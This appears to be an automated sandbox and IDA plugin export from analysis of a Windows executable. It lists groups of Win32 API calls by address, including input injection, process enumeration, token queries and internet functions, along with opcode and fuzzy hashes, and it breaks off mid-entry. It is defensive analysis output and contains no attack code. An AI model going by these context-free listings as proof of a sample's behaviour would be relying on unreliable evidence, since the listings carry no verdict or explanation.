• API String ID: 2652629310-0
APIs
• SendMessageW.USER32(?,00001024,00000000,?), ref: 00CA5352
• GetWindowLongW.USER32(?,000000F0), ref: 00CA5375
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 00CA5382
• InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00CA53A8
Similarity
• API ID: LongWindow$InvalidateMessageRectSend
• String ID:
• API String ID: 3340791633-0
APIs
• GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00C7ABF1
• SetKeyboardState.USER32(00000080,?,00008000), ref: 00C7AC0D
• PostMessageW.USER32(00000000,00000101,00000000), ref: 00C7AC74
• SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00C7ACC6
Similarity
• API ID: KeyboardState$InputMessagePostSend
• String ID:
• API String ID: 432972143-0
APIs
• ClientToScreen.USER32(?,?), ref: 00CA769A
• GetWindowRect.USER32(?,?), ref: 00CA7710
• PtInRect.USER32(?,?,00CA8B89), ref: 00CA7720
• MessageBeep.USER32(00000000), ref: 00CA778C
Similarity
• API ID: Rect$BeepClientMessageScreenWindow
• String ID:
• API String ID: 1352109105-0
APIs
• GetForegroundWindow.USER32 ref: 00CA16EB
  • Part of subcall function 00C73A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C73A57
  • Part of subcall function 00C73A3D: GetCurrentThreadId.KERNEL32 ref: 00C73A5E
  • Part of subcall function 00C73A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00C725B3), ref: 00C73A65
• GetCaretPos.USER32(?), ref: 00CA16FF
• ClientToScreen.USER32(00000000,?), ref: 00CA174C
• GetForegroundWindow.USER32 ref: 00CA1752
Similarity
• API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
• String ID:
• API String ID: 2759813231-0
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 00C7D501
• Process32FirstW.KERNEL32(00000000,?), ref: 00C7D50F
• Process32NextW.KERNEL32(00000000,?), ref: 00C7D52F
• CloseHandle.KERNEL32(00000000), ref: 00C7D5DC
Similarity
• API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
• String ID:
• API String ID: 420147892-0
APIs
  • Part of subcall function 00C29BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00C29BB2
• GetCursorPos.USER32(?), ref: 00CA9001
• TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00C67711,?,?,?,?,?), ref: 00CA9016
• GetCursorPos.USER32(?), ref: 00CA905E
• DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00C67711,?,?,?), ref: 00CA9094
Similarity
• API ID: Cursor$LongMenuPopupProcTrackWindow
• String ID:
• API String ID: 2864067406-0
APIs
• GetFileAttributesW.KERNEL32(?,00CACB68), ref: 00C7D2FB
• GetLastError.KERNEL32 ref: 00C7D30A
• CreateDirectoryW.KERNEL32(?,00000000), ref: 00C7D319
• CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00CACB68), ref: 00C7D376
Similarity
• API ID: CreateDirectory$AttributesErrorFileLast
• String ID:
• API String ID: 2267087916-0
APIs
  • Part of subcall function 00C71014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00C7102A
  • Part of subcall function 00C71014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00C71036
  • Part of subcall function 00C71014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C71045
  • Part of subcall function 00C71014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00C7104C
  • Part of subcall function 00C71014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C71062
• LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00C715BE
• _memcmp.LIBVCRUNTIME ref: 00C715E1
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C71617
• HeapFree.KERNEL32(00000000), ref: 00C7161E
Similarity
• API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
• String ID:
• API String ID: 1592001646-0
                                                                                      APIs
                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 00CA280A
                                                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00CA2824
                                                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00CA2832
                                                                                      • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00CA2840
                                                                                      Similarity
                                                                                      • API ID: Window$Long$AttributesLayered
                                                                                      • String ID:
                                                                                      • API String ID: 2169480361-0
                                                                                      • Opcode ID: c36dbd336b330ccc36628caa3a345d40673368e2fee7dadcf4b01f70dc2ad517
                                                                                      • Instruction ID: 6671f2331eb03a1e6f7fdbeb2e848616b406083dcd89925dd82a6f7bb67b51f9
                                                                                      • Opcode Fuzzy Hash: c36dbd336b330ccc36628caa3a345d40673368e2fee7dadcf4b01f70dc2ad517
                                                                                      • Instruction Fuzzy Hash: FA21D631604522AFD714DB28C884FAA7795EF47328F148158F426CB6D2CB75FD82DB90
                                                                                      APIs
                                                                                        • Part of subcall function 00C78D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00C7790A,?,000000FF,?,00C78754,00000000,?,0000001C,?,?), ref: 00C78D8C
                                                                                        • Part of subcall function 00C78D7D: lstrcpyW.KERNEL32(00000000,?,?,00C7790A,?,000000FF,?,00C78754,00000000,?,0000001C,?,?,00000000), ref: 00C78DB2
                                                                                        • Part of subcall function 00C78D7D: lstrcmpiW.KERNEL32(00000000,?,00C7790A,?,000000FF,?,00C78754,00000000,?,0000001C,?,?), ref: 00C78DE3
                                                                                      • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00C78754,00000000,?,0000001C,?,?,00000000), ref: 00C77923
                                                                                      • lstrcpyW.KERNEL32(00000000,?,?,00C78754,00000000,?,0000001C,?,?,00000000), ref: 00C77949
                                                                                      • lstrcmpiW.KERNEL32(00000002,cdecl,?,00C78754,00000000,?,0000001C,?,?,00000000), ref: 00C77984
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: lstrcmpilstrcpylstrlen
                                                                                      • String ID: cdecl
                                                                                      • API String ID: 4031866154-3896280584
                                                                                      • Opcode ID: 0fbb03b78af89e05d3cd93d0bbf25391deb24a3900d3c8697ddcf7eaf6195079
                                                                                      • Instruction ID: 8b87fec604eb9bd397d83c8baa95700937b369a87ceedab6194062f441cd6345
                                                                                      • Opcode Fuzzy Hash: 0fbb03b78af89e05d3cd93d0bbf25391deb24a3900d3c8697ddcf7eaf6195079
                                                                                      • Instruction Fuzzy Hash: 9611293A201306ABCF156F34D844E7B77A5FF95354B00812EFA0AC7264EF319901D791
                                                                                      APIs
                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00CA7D0B
                                                                                      • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00CA7D2A
                                                                                      • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00CA7D42
                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00C8B7AD,00000000), ref: 00CA7D6B
                                                                                        • Part of subcall function 00C29BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00C29BB2
                                                                                      Similarity
                                                                                      • API ID: Window$Long
                                                                                      • String ID:
                                                                                      • API String ID: 847901565-0
                                                                                      • Opcode ID: 0ce250b49e09785377fd73658393102a587b5e8fbcc489d68604da372d36cb62
                                                                                      • Instruction ID: 8fc06cfc7570fb31406786ef29b5bf6fdac610739d85875fee2a74bb705575ca
                                                                                      • Opcode Fuzzy Hash: 0ce250b49e09785377fd73658393102a587b5e8fbcc489d68604da372d36cb62
                                                                                      • Instruction Fuzzy Hash: 8A117232A05666AFCB109F28DC44BAA3BA5BF46378B154724FC35DB2F0D7309A61DB50
                                                                                      APIs
                                                                                      • SendMessageW.USER32(?,00001060,?,00000004), ref: 00CA56BB
                                                                                      • _wcslen.LIBCMT ref: 00CA56CD
                                                                                      • _wcslen.LIBCMT ref: 00CA56D8
                                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00CA5816
                                                                                      Similarity
                                                                                      • API ID: MessageSend_wcslen
                                                                                      • String ID:
                                                                                      • API String ID: 455545452-0
                                                                                      • Opcode ID: 6ec7bb21334df91f0bc97f58413d40fbccd8353a0899db1e8c5f336ecb244c3d
                                                                                      • Instruction ID: 42b1f66983af257edb860582573f3a0c33b2f94e3f8b17e1614197cc6b18c95c
                                                                                      • Opcode Fuzzy Hash: 6ec7bb21334df91f0bc97f58413d40fbccd8353a0899db1e8c5f336ecb244c3d
                                                                                      • Instruction Fuzzy Hash: 0F11D67161060696DF20DFA1CC85BEE777CFF16768F108026F915D6181EB70DA84CB64
                                                                                      APIs
                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00C71A47
                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C71A59
                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C71A6F
                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C71A8A
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 3850602802-0
                                                                                      • Opcode ID: a196a008e0c3c052f4c139452cae163117fb30130b9eeae20d9096db1db0de60
                                                                                      • Instruction ID: f6e7898f527be73c3e4cf92757fc2ee7a15e1534ebfb2cb59f9cad27c998c0cb
                                                                                      • Opcode Fuzzy Hash: a196a008e0c3c052f4c139452cae163117fb30130b9eeae20d9096db1db0de60
                                                                                      • Instruction Fuzzy Hash: 80113C3AD01219FFEB10DBA9CD85FADBB78EB04750F244091EA04B7290D6716F50EB94
                                                                                      APIs
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00C7E1FD
                                                                                      • MessageBoxW.USER32(?,?,?,?), ref: 00C7E230
                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00C7E246
                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00C7E24D
                                                                                      Similarity
                                                                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                      • String ID:
                                                                                      • API String ID: 2880819207-0
                                                                                      • Opcode ID: df03e39e71391a12fcb1e50cd7e29230fb3d258fadb246641a7ea3808403ca58
                                                                                      • Instruction ID: cbc07bc6691a5328735b001323400aac0395463f26ccec592543d149efa3a5f8
                                                                                      • Opcode Fuzzy Hash: df03e39e71391a12fcb1e50cd7e29230fb3d258fadb246641a7ea3808403ca58
                                                                                      • Instruction Fuzzy Hash: B411DB76A04258BBC7019FA89C49BDF7FAD9B45324F148255F929D7291D670CE0487A0
                                                                                      APIs
                                                                                      • CreateThread.KERNEL32(00000000,?,00C3CFF9,00000000,00000004,00000000), ref: 00C3D218
                                                                                      • GetLastError.KERNEL32 ref: 00C3D224
                                                                                      • __dosmaperr.LIBCMT ref: 00C3D22B
                                                                                      • ResumeThread.KERNEL32(00000000), ref: 00C3D249
                                                                                      Similarity
                                                                                      • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                      • String ID:
                                                                                      • API String ID: 173952441-0
                                                                                      • Opcode ID: d23917b1d61295f8aaf363ef021270cbffb0bb7a592a21814d5d14185329e032
                                                                                      • Instruction ID: b959118ee4db5718603a897211dc6d413b03ab367672c10380d8451c6f93117f
                                                                                      • Opcode Fuzzy Hash: d23917b1d61295f8aaf363ef021270cbffb0bb7a592a21814d5d14185329e032
                                                                                      • Instruction Fuzzy Hash: C601F976825104BBCB115BA6EC45BAF7A6DDF82731F100219F936921D0CF72CD01D7A0
                                                                                      APIs
                                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00C1604C
                                                                                      • GetStockObject.GDI32(00000011), ref: 00C16060
                                                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00C1606A
                                                                                      Similarity
                                                                                      • API ID: CreateMessageObjectSendStockWindow
                                                                                      • String ID:
                                                                                      • API String ID: 3970641297-0
                                                                                      • Opcode ID: 535bddd5a0b0fd4c84b27ddfb899b0cc6f5b9194249d331a68f4e02c35e21ea0
                                                                                      • Instruction ID: db94eb2746635087707f027d907d1bb99daabacde9cdfb2a2ea40a8686e45d83
                                                                                      • Opcode Fuzzy Hash: 535bddd5a0b0fd4c84b27ddfb899b0cc6f5b9194249d331a68f4e02c35e21ea0
                                                                                      • Instruction Fuzzy Hash: 55115E72501548BFEF128F949C84BEEBF69EF0E358F040115FA1452110DB329DA0EB94
                                                                                      APIs
                                                                                      • ___BuildCatchObject.LIBVCRUNTIME ref: 00C33B56
                                                                                        • Part of subcall function 00C33AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00C33AD2
                                                                                        • Part of subcall function 00C33AA3: ___AdjustPointer.LIBCMT ref: 00C33AED
                                                                                      • _UnwindNestedFrames.LIBCMT ref: 00C33B6B
                                                                                      • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00C33B7C
                                                                                      • CallCatchBlock.LIBVCRUNTIME ref: 00C33BA4
                                                                                      Similarity
                                                                                      • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                      • String ID:
                                                                                      • API String ID: 737400349-0
APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00C113C6,00000000,00000000,?,00C4301A,00C113C6,00000000,00000000,00000000,?,00C4328B,00000006,FlsSetValue), ref: 00C430A5
• GetLastError.KERNEL32(?,00C4301A,00C113C6,00000000,00000000,00000000,?,00C4328B,00000006,FlsSetValue,00CB2290,FlsSetValue,00000000,00000364,?,00C42E46), ref: 00C430B1
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00C4301A,00C113C6,00000000,00000000,00000000,?,00C4328B,00000006,FlsSetValue,00CB2290,FlsSetValue,00000000), ref: 00C430BF
Memory Dump Source
• Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID:
• API String ID: 3177248105-0
APIs
• GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 00C7747F
• LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00C77497
• RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00C774AC
• RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00C774CA
Similarity
• API ID: Type$Register$FileLoadModuleNameUser
• String ID:
• API String ID: 1352324309-0
APIs
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00C7ACD3,?,00008000), ref: 00C7B0C4
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00C7ACD3,?,00008000), ref: 00C7B0E9
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00C7ACD3,?,00008000), ref: 00C7B0F3
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00C7ACD3,?,00008000), ref: 00C7B126
Similarity
• API ID: CounterPerformanceQuerySleep
• String ID:
• API String ID: 2875609808-0
APIs
• SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00C72DC5
• GetWindowThreadProcessId.USER32(?,00000000), ref: 00C72DD6
• GetCurrentThreadId.KERNEL32 ref: 00C72DDD
• AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00C72DE4
Similarity
• API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
• String ID:
• API String ID: 2710830443-0
APIs
  • Part of subcall function 00C29639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00C29693
  • Part of subcall function 00C29639: SelectObject.GDI32(?,00000000), ref: 00C296A2
  • Part of subcall function 00C29639: BeginPath.GDI32(?), ref: 00C296B9
  • Part of subcall function 00C29639: SelectObject.GDI32(?,00000000), ref: 00C296E2
• MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00CA8887
• LineTo.GDI32(?,?,?), ref: 00CA8894
• EndPath.GDI32(?), ref: 00CA88A4
• StrokePath.GDI32(?), ref: 00CA88B2
Similarity
• API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
• String ID:
• API String ID: 1539411459-0
APIs
• GetSysColor.USER32(00000008), ref: 00C298CC
• SetTextColor.GDI32(?,?), ref: 00C298D6
• SetBkMode.GDI32(?,00000001), ref: 00C298E9
• GetStockObject.GDI32(00000005), ref: 00C298F1
Similarity
• API ID: Color$ModeObjectStockText
• String ID:
• API String ID: 4037423528-0
APIs
• GetCurrentThread.KERNEL32 ref: 00C71634
• OpenThreadToken.ADVAPI32(00000000,?,?,?,00C711D9), ref: 00C7163B
• GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00C711D9), ref: 00C71648
• OpenProcessToken.ADVAPI32(00000000,?,?,?,00C711D9), ref: 00C7164F
Similarity
• API ID: CurrentOpenProcessThreadToken
• String ID:
• API String ID: 3974789173-0
APIs
• GetDesktopWindow.USER32 ref: 00C6D858
• GetDC.USER32(00000000), ref: 00C6D862
• GetDeviceCaps.GDI32(00000000,0000000C), ref: 00C6D882
• ReleaseDC.USER32(?), ref: 00C6D8A3
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
• String ID:
• API String ID: 2889604237-0
APIs
• GetDesktopWindow.USER32 ref: 00C6D86C
• GetDC.USER32(00000000), ref: 00C6D876
• GetDeviceCaps.GDI32(00000000,0000000C), ref: 00C6D882
• ReleaseDC.USER32(?), ref: 00C6D8A3
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
• String ID:
• API String ID: 2889604237-0
APIs
  • Part of subcall function 00C17620: _wcslen.LIBCMT ref: 00C17625
• WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00C84ED4
Strings
Memory Dump Source
• Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: Connection_wcslen
• String ID: *$LPT
APIs
• __startOneArgErrorHandling.LIBCMT ref: 00C3E30D
Strings
Similarity
• API ID: ErrorHandling__start
• String ID: pow
Strings
Similarity
• API ID:
• String ID: #
APIs
• Sleep.KERNEL32(00000000), ref: 00C2F2A2
• GlobalMemoryStatusEx.KERNEL32(?), ref: 00C2F2BB
Strings
Similarity
• API ID: GlobalMemorySleepStatus
• String ID: @
APIs
• CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 00C957E0
• _wcslen.LIBCMT ref: 00C957EC
Strings
Similarity
• API ID: BuffCharUpper_wcslen
• String ID: CALLARGARRAY
APIs
• _wcslen.LIBCMT ref: 00C8D130
• InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00C8D13A
Strings
Similarity
• API ID: CrackInternet_wcslen
• String ID: |
APIs
• DestroyWindow.USER32(?,?,?,?), ref: 00CA3621
• MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00CA365C
Strings
Similarity
• API ID: Window$DestroyMove
• String ID: static
APIs
• SendMessageW.USER32(?,00001132,00000000,?), ref: 00CA461F
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00CA4634
Strings
Similarity
• API ID: MessageSend
• String ID: '
APIs
• SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00CA327C
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00CA3287
Strings
Similarity
• API ID: MessageSend
• String ID: Combobox
APIs
  • Part of subcall function 00C1600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00C1604C
  • Part of subcall function 00C1600E: GetStockObject.GDI32(00000011), ref: 00C16060
  • Part of subcall function 00C1600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C1606A
• GetWindowRect.USER32(00000000,?), ref: 00CA377A
• GetSysColor.USER32(00000012), ref: 00CA3794
Strings
Similarity
• API ID: Window$ColorCreateMessageObjectRectSendStock
• String ID: static
APIs
• InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00C8CD7D
• InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00C8CDA6
Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Internet$OpenOption
                                                                                      • String ID: <local>
                                                                                      • API String ID: 942729171-4266983199
                                                                                      • Opcode ID: 24ee5c9e7e8e12e4eabee8c2d5d3c9d9b71913744aa53bb601a1919c71acd750
                                                                                      • Instruction ID: c1a63be00c400f3b9d336be049fc8de2b10ac5a555087777f12ba0bd2f772922
                                                                                      • Opcode Fuzzy Hash: 24ee5c9e7e8e12e4eabee8c2d5d3c9d9b71913744aa53bb601a1919c71acd750
                                                                                      • Instruction Fuzzy Hash: 9211A071205631BAD7286B668CC9FE7BEA8EB137A8F00423BF11983180D7709951D7F4
                                                                                      APIs
                                                                                      • GetWindowTextLengthW.USER32(00000000), ref: 00CA34AB
                                                                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00CA34BA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: LengthMessageSendTextWindow
                                                                                      • String ID: edit
                                                                                      • API String ID: 2978978980-2167791130
                                                                                      • Opcode ID: e47d04e3918b005ae051d507b7efdc1deaaa1cdf94d284e1920c7af8d709f1bd
                                                                                      • Instruction ID: c50fed5f147387fc2056b16069eb1b28842620f12ef905ecc9545e3858478337
                                                                                      • Opcode Fuzzy Hash: e47d04e3918b005ae051d507b7efdc1deaaa1cdf94d284e1920c7af8d709f1bd
                                                                                      • Instruction Fuzzy Hash: 97118F7150024AAFEB128E64DC94BEB3B6AEB0A37CF504724F971971D0C771DE91AB50
                                                                                      APIs
                                                                                        • Part of subcall function 00C19CB3: _wcslen.LIBCMT ref: 00C19CBD
                                                                                      • CharUpperBuffW.USER32(?,?,?), ref: 00C76CB6
                                                                                      • _wcslen.LIBCMT ref: 00C76CC2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcslen$BuffCharUpper
                                                                                      • String ID: STOP
                                                                                      • API String ID: 1256254125-2411985666
                                                                                      • Opcode ID: b415d007b996b0191449d1674f2aa38cd916cc3ecd145ea6ab3371676d2ffc5f
                                                                                      • Instruction ID: 218eacbff30c41cdd68c1bafdbe6a9775a27960571a3bf634008751d190db2bd
                                                                                      • Opcode Fuzzy Hash: b415d007b996b0191449d1674f2aa38cd916cc3ecd145ea6ab3371676d2ffc5f
                                                                                      • Instruction Fuzzy Hash: 8C0126326109268BCB21AFFDCC909FF33B8EF61710B104524E96697190EB31DA40D650
                                                                                      APIs
                                                                                        • Part of subcall function 00C19CB3: _wcslen.LIBCMT ref: 00C19CBD
                                                                                        • Part of subcall function 00C73CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00C73CCA
                                                                                      • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00C71D4C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClassMessageNameSend_wcslen
                                                                                      • String ID: ComboBox$ListBox
                                                                                      • API String ID: 624084870-1403004172
                                                                                      • Opcode ID: 23d7d0700c34be3c035d6c44c6ae9f9906dd883a8b78fe6333b8ace384f6ad15
                                                                                      • Instruction ID: 50d27e8d44c8b81814c1a55521eba9fe7c696c62a58d80b77bdc21ee898bf44d
                                                                                      • Opcode Fuzzy Hash: 23d7d0700c34be3c035d6c44c6ae9f9906dd883a8b78fe6333b8ace384f6ad15
                                                                                      • Instruction Fuzzy Hash: 4501FC71601214ABCB15EBA8CC61DFE7368FF57390F04461AFC76573C1EA305908AB60
                                                                                      APIs
                                                                                        • Part of subcall function 00C19CB3: _wcslen.LIBCMT ref: 00C19CBD
                                                                                        • Part of subcall function 00C73CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00C73CCA
                                                                                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 00C71C46
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClassMessageNameSend_wcslen
                                                                                      • String ID: ComboBox$ListBox
                                                                                      • API String ID: 624084870-1403004172
                                                                                      • Opcode ID: 2bbf8688312d3184ed0405759722fc4cce7dc13d04f1bbd589542949b0e31d6a
                                                                                      • Instruction ID: 8aa64d59a9a8a1e1154335539a1629164c4bff6e34df86e22760766c544c922e
                                                                                      • Opcode Fuzzy Hash: 2bbf8688312d3184ed0405759722fc4cce7dc13d04f1bbd589542949b0e31d6a
                                                                                      • Instruction Fuzzy Hash: B701A77578110467DB05EBD4C962AFF77A8DB13380F24401ABD5A672C1EA209F18A6B1
                                                                                      APIs
                                                                                        • Part of subcall function 00C19CB3: _wcslen.LIBCMT ref: 00C19CBD
                                                                                        • Part of subcall function 00C73CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00C73CCA
                                                                                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 00C71CC8
                                                                                      Strings
